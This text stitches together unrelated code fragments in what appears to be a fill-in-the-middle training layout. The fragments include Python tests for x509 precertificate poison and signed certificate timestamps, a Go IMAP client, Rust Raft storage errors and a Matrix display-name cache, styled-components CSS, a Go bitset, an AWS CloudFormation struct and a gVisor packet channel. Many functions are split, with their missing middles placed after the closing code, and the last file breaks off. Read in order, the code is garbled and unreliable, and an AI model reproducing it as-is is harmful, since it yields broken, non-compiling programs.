assert isinstance(poison, x509.PrecertPoison)
def test_generate(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
cert = (
_make_certbuilder(private_key)
.add_extension(x509.PrecertPoison(), critical=True)
.sign(private_key, hashes.SHA256(), backend)
)
poison = cert.extensions.get_extension_for_oid(
ExtensionOID.PRECERT_POISON
).value
assert isinstance(poison, x509.PrecertPoison)
def test_eq(self):
pcp1 = x509.PrecertPoison()
pcp2 = x509.PrecertPoison()
assert pcp1 == pcp2
def test_hash(self):
pcp1 = x509.PrecertPoison()
pcp2 = x509.PrecertPoison()
assert hash(pcp1) == hash(pcp2)
def test_ne(self):
pcp1 = x509.PrecertPoison()
pcp2 = x509.PrecertPoison()
assert pcp1 == pcp2
assert (pcp1 != pcp2) is False
assert pcp1 != object()
def test_repr(self):
pcp = x509.PrecertPoison()
assert repr(pcp) == "<PrecertPoison()>"
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestSignedCertificateTimestamps(object):
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_eq(self, backend):
sct = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
sct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
assert sct == sct2
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_ne(self, backend):
sct = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
sct2 = (
_load_cert(
os.path.join("x509", "cryptography-scts.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
assert sct != sct2
assert sct != object()
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_hash(self, backend):
sct = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
sct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
sct3 = (
_load_cert(
os.path.join("x509", "cryptography-scts.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
assert hash(sct) == hash(sct2)
assert hash(sct) != hash(sct3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestPrecertificateSignedCertificateTimestampsExtension(object):
def test_init(self):
with pytest.raises(TypeError):
x509.PrecertificateSignedCertificateTimestamps(
[object()] # type:ignore[list-item]
)
def test_repr(self):
assert repr(x509.PrecertificateSignedCertificateTimestamps([])) == (
"<PrecertificateSignedCertificateTimestamps([])>"
)
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_eq(self, backend):
psct1 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
psct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
assert psct1 == psct2
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_ne(self, backend):
psct1 = (
_load_cert(
os.path.join("x509", "cryptography-scts.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
psct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
assert psct1 != psct2
assert psct1 != object()
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_hash(self, backend):
psct1 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
psct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
psct3 = (
_load_cert(
os.path.join("x509", "cryptography-scts.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
assert hash(psct1) == hash(psct2)
assert hash(psct1) != hash(psct3)
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_simple(self, backend):
cert = _load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
scts = cert.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
).value
assert len(scts) == 1
[sct] = scts
assert scts[0] == sct
assert sct.version == x509.certificate_transparency.Version.v1
assert sct.log_id == (
b"\xa7\xceJNb\x07\xe0\xad\xde\xe5\xfd\xaaK\x1f\x86v\x87g\xb5\xd0"
b"\x02\xa5]G1\x0e~g\n\x95\xea\xb2"
)
assert sct.timestamp == datetime.datetime(
2016, 11, 17, 1, 56, 25, 396000
)
assert (
sct.entry_type
== x509.certificate_transparency.LogEntryType.PRE_CERTIFICATE
)
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_generate(self, backend):
cert = _load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
scts = cert.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
).value
assert len(scts) == 1
[sct] = scts
private_key = RSA_KEY_2048.private_key(backend)
builder = _make_certbuilder(private_key).add_extension(
x509.PrecertificateSignedCertificateTimestamps([sct]),
critical=False,
)
cert = builder.sign(private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
).value
assert list(ext) == [sct]
@pytest.mark.supported(
only_if=lambda backend: backend._lib.CRYPTOGRAPHY_IS_LIBRESSL,
skip_message="Requires LibreSSL",
)
def test_skips_scts_if_unsupported(self, backend):
cert = _load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
assert len(cert.extensions) == 10
with pytest.raises(x509.ExtensionNotFound):
cert.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
ext = cert.extensions.get_extension_for_oid(
x509.ExtensionOID.PRECERT_SIGNED_CERTIFICATE_TIMESTAMPS
)
assert isinstance(ext.value, x509.UnrecognizedExtension)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestInvalidExtension(object):
def test_invalid_certificate_policies_data(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "cp_invalid.pem"),
x509.load_pem_x509_certificate,
backend,
)
with pytest.raises(ValueError):
cert.extensions
class TestOCSPNonce(object):
def test_non_bytes(self):
with pytest.raises(TypeError):
x509.OCSPNonce(38) # type:ignore[arg-type]
def test_eq(self):
nonce1 = x509.OCSPNonce(b"0" * 5)
nonce2 = x509.OCSPNonce(b"0" * 5)
assert nonce1 == nonce2
def test_ne(self):
nonce1 = x509.OCSPNonce(b"0" * 5)
nonce2 = x509.OCSPNonce(b"0" * 6)
assert nonce1 != nonce2
assert nonce1 != object()
def test_repr(self):
nonce1 = x509.OCSPNonce(b"nonce")
assert repr(nonce1) == "<OCSPNonce(nonce=b'nonce')>"
def test_hash(self):
nonce1 = x509.OCSPNonce(b"0" * 5)
nonce2 = x509.OCSPNonce(b"0" * 5)
nonce3 = x509.OCSPNonce(b"1" * 5)
assert hash(nonce1) == hash(nonce2)
assert hash(nonce1) != hash(nonce3)
def test_all_extension_oid_members_have_names_defined():
for oid in dir(ExtensionOID):
if oid.startswith("__"):
continue
assert getattr(ExtensionOID, oid) in _OID_NAMES | )
|
client.go | package i18nlevel
import (
"github.com/emersion/go-imap"
"github.com/emersion/go-imap/client"
)
type Client struct {
c *client.Client
}
func NewClient(c *client.Client) *Client {
return &Client{c: c}
}
// I18NLevel returns the internationalization level supported by the server.
//
// If server does not support the I18NLEVEL extension, 0 is returned.
func (c *Client) I18NLevel() (int, error) {
ok, err := c.c.Support("I18NLEVEL=1")
if err != nil {
return -1, nil
}
if ok |
ok, err = c.c.Support("I18NLEVEL=2")
if err != nil {
return -1, nil
}
if ok {
return 2, nil
}
return 0, nil
}
// ActiveComparator returns the active comparator used.
//
// This command is valid only if I18NLevel() returns 2.
// See RFC 5255 for details.
func (c *Client) ActiveComparator() (string, error) {
if c.c.State()&imap.AuthenticatedState == 0 {
return "", client.ErrNotLoggedIn
}
res := &Comparators{}
status, err := c.c.Execute(&ComparatorCmd{}, res)
if err != nil {
return "", err
}
if err := status.Err(); err != nil {
return "", err
}
return res.Active, nil
}
// ActiveComparator changes the active comparator to the first comparator
// listed in cmps and supported by the server.
//
// This command is valid only if I18NLevel() returns 2.
// See RFC 5255 for details.
func (c *Client) UseComparator(cmps []string) (string, []string, error) {
if c.c.State()&imap.AuthenticatedState == 0 {
return "", nil, client.ErrNotLoggedIn
}
res := &Comparators{}
status, err := c.c.Execute(&ComparatorCmd{
Comparators: cmps,
}, res)
if err != nil {
return "", nil, err
}
if err := status.Err(); err != nil {
return "", nil, err
}
return res.Active, res.Matched, nil
}
| {
return 1, nil
} |
storage_error.rs | use std::fmt::Formatter;
use std::ops::Bound;
use anyerror::AnyError;
use crate::LogId;
use crate::NodeId;
use crate::SnapshotMeta;
use crate::Vote;
/// Convert error to StorageError::IO();
pub trait ToStorageResult<NID: NodeId, T> {
/// Convert Result<T, E> to Result<T, StorageError::IO(StorageIOError)>
///
/// `f` provides error context for building the StorageIOError.
fn sto_res<F>(self, f: F) -> Result<T, StorageError<NID>>
where F: FnOnce() -> (ErrorSubject<NID>, ErrorVerb);
}
impl<NID: NodeId, T> ToStorageResult<NID, T> for Result<T, std::io::Error> {
fn sto_res<F>(self, f: F) -> Result<T, StorageError<NID>>
where F: FnOnce() -> (ErrorSubject<NID>, ErrorVerb) {
match self {
Ok(x) => Ok(x),
Err(e) => {
let (subject, verb) = f();
let io_err = StorageIOError::new(subject, verb, AnyError::new(&e));
Err(io_err.into())
}
}
}
}
/// An error that occurs when the RaftStore impl runs defensive check of input or output.
/// E.g. re-applying an log entry is a violation that may be a potential bug.
#[derive(Debug, Clone, thiserror::Error, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub struct DefensiveError<NID: NodeId> {
/// The subject that violates store defensive check, e.g. hard-state, log or state machine.
pub subject: ErrorSubject<NID>,
/// The description of the violation.
pub violation: Violation<NID>,
pub backtrace: Option<String>,
}
impl<NID: NodeId> DefensiveError<NID> {
pub fn | (subject: ErrorSubject<NID>, violation: Violation<NID>) -> Self {
Self {
subject,
violation,
backtrace: anyerror::backtrace_str(),
}
}
}
impl<NID: NodeId> std::fmt::Display for DefensiveError<NID> {
fn fmt(&self, f: &mut Formatter<'_>) -> std::fmt::Result {
write!(f, "'{:?}' violates: '{}'", self.subject, self.violation)
}
}
#[derive(Debug, Clone, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub enum ErrorSubject<NID: NodeId> {
/// A general storage error
Store,
/// HardState related error.
Vote,
/// Error that is happened when operating a series of log entries
Logs,
/// Error about a single log entry
Log(LogId<NID>),
/// Error about a single log entry without knowing the log term.
LogIndex(u64),
/// Error happened when applying a log entry
Apply(LogId<NID>),
/// Error happened when operating state machine.
StateMachine,
/// Error happened when operating snapshot.
Snapshot(SnapshotMeta<NID>),
None,
}
/// What it is doing when an error occurs.
#[derive(Debug, Clone, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub enum ErrorVerb {
Read,
Write,
Seek,
Delete,
}
/// Violations a store would return when running defensive check.
#[derive(Debug, Clone, thiserror::Error, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub enum Violation<NID: NodeId> {
#[error("term can only be change to a greater value, current: {curr}, change to {to}")]
TermNotAscending { curr: u64, to: u64 },
#[error("voted_for can not change from Some() to other Some(), current: {curr:?}, change to {to:?}")]
NonIncrementalVote { curr: Vote<NID>, to: Vote<NID> },
#[error("log at higher index is obsolete: {higher_index_log_id:?} should GT {lower_index_log_id:?}")]
DirtyLog {
higher_index_log_id: LogId<NID>,
lower_index_log_id: LogId<NID>,
},
#[error("try to get log at index {want} but got {got:?}")]
LogIndexNotFound { want: u64, got: Option<u64> },
#[error("range is empty: start: {start:?}, end: {end:?}")]
RangeEmpty { start: Option<u64>, end: Option<u64> },
#[error("range is not half-open: start: {start:?}, end: {end:?}")]
RangeNotHalfOpen { start: Bound<u64>, end: Bound<u64> },
// TODO(xp): rename this to some input related error name.
#[error("empty log vector")]
LogsEmpty,
#[error("all logs are removed. It requires at least one log to track continuity")]
StoreLogsEmpty,
#[error("logs are not consecutive, prev: {prev:?}, next: {next}")]
LogsNonConsecutive { prev: Option<LogId<NID>>, next: LogId<NID> },
#[error("invalid next log to apply: prev: {prev:?}, next: {next}")]
ApplyNonConsecutive { prev: Option<LogId<NID>>, next: LogId<NID> },
#[error("applied log can not conflict, last_applied: {last_applied:?}, delete since: {first_conflict_log_id}")]
AppliedWontConflict {
last_applied: Option<LogId<NID>>,
first_conflict_log_id: LogId<NID>,
},
#[error("not allowed to purge non-applied logs, last_applied: {last_applied:?}, purge upto: {purge_upto}")]
PurgeNonApplied {
last_applied: Option<LogId<NID>>,
purge_upto: LogId<NID>,
},
}
/// A storage error could be either a defensive check error or an error occurred when doing the actual io operation.
#[derive(Debug, Clone, thiserror::Error, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub enum StorageError<NID: NodeId> {
/// An error raised by defensive check.
#[error(transparent)]
Defensive {
#[from]
#[cfg_attr(feature = "bt", backtrace)]
source: DefensiveError<NID>,
},
/// An error raised by io operation.
#[error(transparent)]
IO {
#[from]
#[cfg_attr(feature = "bt", backtrace)]
source: StorageIOError<NID>,
},
}
impl<NID: NodeId> StorageError<NID> {
pub fn into_defensive(self) -> Option<DefensiveError<NID>> {
match self {
StorageError::Defensive { source } => Some(source),
_ => None,
}
}
pub fn into_io(self) -> Option<StorageIOError<NID>> {
match self {
StorageError::IO { source } => Some(source),
_ => None,
}
}
pub fn from_io_error(subject: ErrorSubject<NID>, verb: ErrorVerb, io_error: std::io::Error) -> Self {
let sto_io_err = StorageIOError::new(subject, verb, AnyError::new(&io_error));
StorageError::IO { source: sto_io_err }
}
}
/// Error that occurs when operating the store.
#[derive(Debug, Clone, thiserror::Error, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub struct StorageIOError<NID: NodeId> {
subject: ErrorSubject<NID>,
verb: ErrorVerb,
source: AnyError,
backtrace: Option<String>,
}
impl<NID: NodeId> std::fmt::Display for StorageIOError<NID> {
fn fmt(&self, f: &mut Formatter<'_>) -> std::fmt::Result {
write!(f, "when {:?} {:?}: {}", self.verb, self.subject, self.source)
}
}
impl<NID: NodeId> StorageIOError<NID> {
pub fn new(subject: ErrorSubject<NID>, verb: ErrorVerb, source: AnyError) -> Self {
Self {
subject,
verb,
source,
backtrace: anyerror::backtrace_str(),
}
}
}
| new |
styles.ts | import styled from "styled-components";
import { darken, transparentize } from "polished";
export const Container = styled.form`
h2 {
color: var(--text-title);
font-size: 1.5rem;
margin-bottom: 2rem;
}
input {
width: 100%;
padding: 0 1.5rem;
height: 4rem;
border-radius: 0.25rem;
background: #e7e9ee;
border: 1px solid #d7d7d7;
font-weight: 400;
font-size: 1rem;
&::placeholder {
color: var(--text-body);
}
& + input {
margin-top: 1rem;
}
}
button[type="submit"] {
width: 100%;
padding: 0 1.5rem;
height: 4rem;
background: var(--green); | color: white;
border-radius: 0.25rem;
border: 0;
font-size: 1rem;
margin-top: 1.5rem;
font-weight: 600;
transition: filter 0.2s;
&:hover {
filter: brightness(0.9);
}
}
`;
export const ButtonsWrapper = styled.div`
margin: 1rem 0;
display: grid;
grid-template-columns: 1fr 1fr;
gap: 0.5rem;
button {
}
`;
interface RadioBoxProps {
isActive: boolean;
activeColor: "green" | "red";
}
const colors = {
red: "#E52E4D",
green: "#33CC95",
};
export const RadioBox = styled.button<RadioBoxProps>`
height: 4rem;
border: 1px solid #d7d7d7;
border-radius: 0.25rem;
background: ${(props) =>
props.isActive
? transparentize(0.9, colors[props.activeColor])
: "transparent"};
display: flex;
align-items: center;
justify-content: center;
transition: border-color 0.2s;
img {
width: 20px;
height: 20px;
}
span {
display: inline-block;
margin-left: 1rem;
font-size: 1rem;
color: var(--text-title);
}
&:hover {
border-color: ${darken(0.1, "#D7D7D7")};
}
`; | |
bitset.go | package porcupine
import "math/bits"
type bitset []uint64
// data layout:
// bits 0-63 are in data[0], the next are in data[1], etc.
func newBitset(bits uint) bitset {
extra := uint(0)
if bits%64 != 0 |
chunks := bits/64 + extra
return bitset(make([]uint64, chunks))
}
func (b bitset) clone() bitset {
dataCopy := make([]uint64, len(b))
copy(dataCopy, b)
return bitset(dataCopy)
}
func bitsetIndex(pos uint) (uint, uint) {
return pos / 64, pos % 64
}
func (b bitset) set(pos uint) bitset {
major, minor := bitsetIndex(pos)
b[major] |= (1 << minor)
return b
}
func (b bitset) clear(pos uint) bitset {
major, minor := bitsetIndex(pos)
b[major] &^= (1 << minor)
return b
}
func (b bitset) get(pos uint) bool {
major, minor := bitsetIndex(pos)
return b[major]&(1<<minor) != 0
}
func (b bitset) popcnt() uint {
total := 0
for _, v := range b {
total += bits.OnesCount64(v)
}
return uint(total)
}
func (b bitset) hash() uint64 {
hash := uint64(b.popcnt())
for _, v := range b {
hash ^= v
}
return hash
}
func (b bitset) equals(b2 bitset) bool {
if len(b) != len(b2) {
return false
}
for i := range b {
if b[i] != b2[i] {
return false
}
}
return true
}
| {
extra = 1
} |
aws-cloudwatch-anomalydetector_dimension.go | package cloudwatch
import (
"github.com/fmechant/goformation/v4/cloudformation/policies"
) |
// Name AWS CloudFormation Property
// Required: true
// See: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-cloudwatch-anomalydetector-dimension.html#cfn-cloudwatch-anomalydetector-dimension-name
Name string `json:"Name,omitempty"`
// Value AWS CloudFormation Property
// Required: true
// See: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-cloudwatch-anomalydetector-dimension.html#cfn-cloudwatch-anomalydetector-dimension-value
Value string `json:"Value,omitempty"`
// AWSCloudFormationDeletionPolicy represents a CloudFormation DeletionPolicy
AWSCloudFormationDeletionPolicy policies.DeletionPolicy `json:"-"`
// AWSCloudFormationUpdateReplacePolicy represents a CloudFormation UpdateReplacePolicy
AWSCloudFormationUpdateReplacePolicy policies.UpdateReplacePolicy `json:"-"`
// AWSCloudFormationDependsOn stores the logical ID of the resources to be created before this resource
AWSCloudFormationDependsOn []string `json:"-"`
// AWSCloudFormationMetadata stores structured data associated with this resource
AWSCloudFormationMetadata map[string]interface{} `json:"-"`
// AWSCloudFormationCondition stores the logical ID of the condition that must be satisfied for this resource to be created
AWSCloudFormationCondition string `json:"-"`
}
// AWSCloudFormationType returns the AWS CloudFormation resource type
func (r *AnomalyDetector_Dimension) AWSCloudFormationType() string {
return "AWS::CloudWatch::AnomalyDetector.Dimension"
} |
// AnomalyDetector_Dimension AWS CloudFormation Resource (AWS::CloudWatch::AnomalyDetector.Dimension)
// See: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-cloudwatch-anomalydetector-dimension.html
type AnomalyDetector_Dimension struct { |
ambiguity_map.rs | // Copyright 2021 The Matrix.org Foundation C.I.C.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use std::collections::{BTreeMap, BTreeSet};
use matrix_sdk_common::deserialized_responses::{AmbiguityChange, MemberEvent};
use ruma::{events::room::member::MembershipState, EventId, RoomId, UserId};
use tracing::trace;
use super::{Result, StateChanges};
use crate::Store;
#[derive(Clone, Debug)]
pub struct AmbiguityCache {
pub store: Store,
pub cache: BTreeMap<RoomId, BTreeMap<String, BTreeSet<UserId>>>,
pub changes: BTreeMap<RoomId, BTreeMap<EventId, AmbiguityChange>>,
}
#[derive(Clone, Debug)]
struct AmbiguityMap {
display_name: String,
users: BTreeSet<UserId>,
}
impl AmbiguityMap {
fn remove(&mut self, user_id: &UserId) -> Option<UserId> {
self.users.remove(user_id);
if self.user_count() == 1 {
self.users.iter().next().cloned()
} else {
None
}
}
fn add(&mut self, user_id: UserId) -> Option<UserId> {
let ambiguous_user =
if self.user_count() == 1 { self.users.iter().next().cloned() } else { None };
self.users.insert(user_id);
ambiguous_user
}
fn user_count(&self) -> usize {
self.users.len()
}
fn is_ambiguous(&self) -> bool {
self.user_count() > 1
}
}
impl AmbiguityCache {
pub fn | (store: Store) -> Self {
Self { store, cache: BTreeMap::new(), changes: BTreeMap::new() }
}
pub async fn handle_event(
&mut self,
changes: &StateChanges,
room_id: &RoomId,
member_event: &MemberEvent,
) -> Result<()> {
// Synapse seems to have a bug where it puts the same event into the
// state and the timeline sometimes.
//
// Since our state, e.g. the old display name, already ended up inside
// the state changes and we're pulling stuff out of the cache if it's
// there calculating this twice for the same event will result in an
// incorrect AmbiguityChange overwriting the correct one. In other
// words, this method is not idempotent so we make it by ignoring
// duplicate events.
if self
.changes
.get(room_id)
.map(|c| c.contains_key(&member_event.event_id))
.unwrap_or(false)
{
return Ok(());
}
let (mut old_map, mut new_map) = self.get(changes, room_id, member_event).await?;
let display_names_same = match (&old_map, &new_map) {
(Some(a), Some(b)) => a.display_name == b.display_name,
_ => false,
};
if display_names_same {
return Ok(());
}
let disambiguated_member = old_map.as_mut().and_then(|o| o.remove(&member_event.state_key));
let ambiguated_member =
new_map.as_mut().and_then(|n| n.add(member_event.state_key.clone()));
let ambiguous = new_map.as_ref().map(|n| n.is_ambiguous()).unwrap_or(false);
self.update(room_id, old_map, new_map);
let change = AmbiguityChange {
disambiguated_member,
ambiguated_member,
member_ambiguous: ambiguous,
};
trace!("Handling display name ambiguity for {}: {:#?}", member_event.state_key, change);
self.add_change(room_id, member_event.event_id.clone(), change);
Ok(())
}
fn update(
&mut self,
room_id: &RoomId,
old_map: Option<AmbiguityMap>,
new_map: Option<AmbiguityMap>,
) {
let entry = self.cache.entry(room_id.clone()).or_insert_with(BTreeMap::new);
if let Some(old) = old_map {
entry.insert(old.display_name, old.users);
}
if let Some(new) = new_map {
entry.insert(new.display_name, new.users);
}
}
fn add_change(&mut self, room_id: &RoomId, event_id: EventId, change: AmbiguityChange) {
self.changes.entry(room_id.clone()).or_insert_with(BTreeMap::new).insert(event_id, change);
}
async fn get(
&mut self,
changes: &StateChanges,
room_id: &RoomId,
member_event: &MemberEvent,
) -> Result<(Option<AmbiguityMap>, Option<AmbiguityMap>)> {
use MembershipState::*;
let old_event = if let Some(m) =
changes.members.get(room_id).and_then(|m| m.get(&member_event.state_key))
{
Some(m.clone())
} else {
self.store.get_member_event(room_id, &member_event.state_key).await?
};
let old_display_name = if let Some(event) = old_event {
if matches!(event.content.membership, Join | Invite) {
let display_name = if let Some(d) = changes
.profiles
.get(room_id)
.and_then(|p| p.get(&member_event.state_key))
.and_then(|p| p.displayname.as_deref())
{
Some(d.to_string())
} else if let Some(d) = self
.store
.get_profile(room_id, &member_event.state_key)
.await?
.and_then(|c| c.displayname)
{
Some(d)
} else {
event.content.displayname.clone()
};
Some(display_name.unwrap_or_else(|| event.state_key.localpart().to_string()))
} else {
None
}
} else {
None
};
let old_map = if let Some(old_name) = old_display_name.as_deref() {
let old_display_name_map = if let Some(u) =
self.cache.entry(room_id.clone()).or_insert_with(BTreeMap::new).get(old_name)
{
u.clone()
} else {
self.store.get_users_with_display_name(room_id, old_name).await?
};
Some(AmbiguityMap { display_name: old_name.to_string(), users: old_display_name_map })
} else {
None
};
let new_map = if matches!(member_event.content.membership, Join | Invite) {
let new = member_event
.content
.displayname
.as_deref()
.unwrap_or_else(|| member_event.state_key.localpart());
// We don't allow other users to set the display name, so if we
// have a more trusted version of the display
// name use that.
let new_display_name = if member_event.sender.as_str() == member_event.state_key {
new
} else if let Some(old) = old_display_name.as_deref() {
old
} else {
new
};
let new_display_name_map = if let Some(u) = self
.cache
.entry(room_id.clone())
.or_insert_with(BTreeMap::new)
.get(new_display_name)
{
u.clone()
} else {
self.store.get_users_with_display_name(room_id, new_display_name).await?
};
Some(AmbiguityMap {
display_name: new_display_name.to_string(),
users: new_display_name_map,
})
} else {
None
};
Ok((old_map, new_map))
}
}
| new |
channel.go | // Copyright 2018 The gVisor Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Package channel provides the implemention of channel-based data-link layer
// endpoints. Such endpoints allow injection of inbound packets and store
// outbound packets in a channel.
package channel
import (
"context"
"gvisor.dev/gvisor/pkg/sync"
"gvisor.dev/gvisor/pkg/tcpip"
"gvisor.dev/gvisor/pkg/tcpip/header"
"gvisor.dev/gvisor/pkg/tcpip/stack"
)
// PacketInfo holds all the information about an outbound packet.
type PacketInfo struct {
Pkt *stack.PacketBuffer
Proto tcpip.NetworkProtocolNumber
Route stack.RouteInfo
}
// Notification is the interface for receiving notification from the packet
// queue.
type Notification interface {
// WriteNotify will be called when a write happens to the queue.
WriteNotify()
}
// NotificationHandle is an opaque handle to the registered notification target.
// It can be used to unregister the notification when no longer interested.
//
// +stateify savable
type NotificationHandle struct {
n Notification
}
type queue struct {
// c is the outbound packet channel.
c chan PacketInfo
// mu protects fields below.
mu sync.RWMutex
notify []*NotificationHandle
}
func (q *queue) Close() {
close(q.c)
}
func (q *queue) Read() (PacketInfo, bool) {
select {
case p := <-q.c:
return p, true
default:
return PacketInfo{}, false
}
}
func (q *queue) ReadContext(ctx context.Context) (PacketInfo, bool) {
select {
case pkt := <-q.c:
return pkt, true
case <-ctx.Done():
return PacketInfo{}, false
}
}
func (q *queue) Write(p PacketInfo) bool {
wrote := false
select {
case q.c <- p:
wrote = true
default:
}
q.mu.Lock()
notify := q.notify
q.mu.Unlock()
if wrote {
// Send notification outside of lock.
for _, h := range notify {
h.n.WriteNotify()
}
}
return wrote
}
func (q *queue) Num() int {
return len(q.c)
}
func (q *queue) AddNotify(notify Notification) *NotificationHandle {
q.mu.Lock()
defer q.mu.Unlock()
h := &NotificationHandle{n: notify}
q.notify = append(q.notify, h)
return h
}
func (q *queue) RemoveNotify(handle *NotificationHandle) {
q.mu.Lock()
defer q.mu.Unlock()
// Make a copy, since we reads the array outside of lock when notifying.
notify := make([]*NotificationHandle, 0, len(q.notify))
for _, h := range q.notify {
if h != handle {
notify = append(notify, h)
}
}
q.notify = notify
}
// Endpoint is link layer endpoint that stores outbound packets in a channel
// and allows injection of inbound packets.
type Endpoint struct {
dispatcher stack.NetworkDispatcher
mtu uint32
linkAddr tcpip.LinkAddress
LinkEPCapabilities stack.LinkEndpointCapabilities
// Outbound packet queue.
q *queue
}
// New creates a new channel endpoint.
func New(size int, mtu uint32, linkAddr tcpip.LinkAddress) *Endpoint |
// Close closes e. Further packet injections will panic. Reads continue to
// succeed until all packets are read.
func (e *Endpoint) Close() {
e.q.Close()
}
// Read does non-blocking read one packet from the outbound packet queue.
func (e *Endpoint) Read() (PacketInfo, bool) {
return e.q.Read()
}
// ReadContext does blocking read for one packet from the outbound packet queue.
// It can be cancelled by ctx, and in this case, it returns false.
func (e *Endpoint) ReadContext(ctx context.Context) (PacketInfo, bool) {
return e.q.ReadContext(ctx)
}
// Drain removes all outbound packets from the channel and counts them.
func (e *Endpoint) Drain() int {
c := 0
for {
if _, ok := e.Read(); !ok {
return c
}
c++
}
}
// NumQueued returns the number of packet queued for outbound.
func (e *Endpoint) NumQueued() int {
return e.q.Num()
}
// InjectInbound injects an inbound packet.
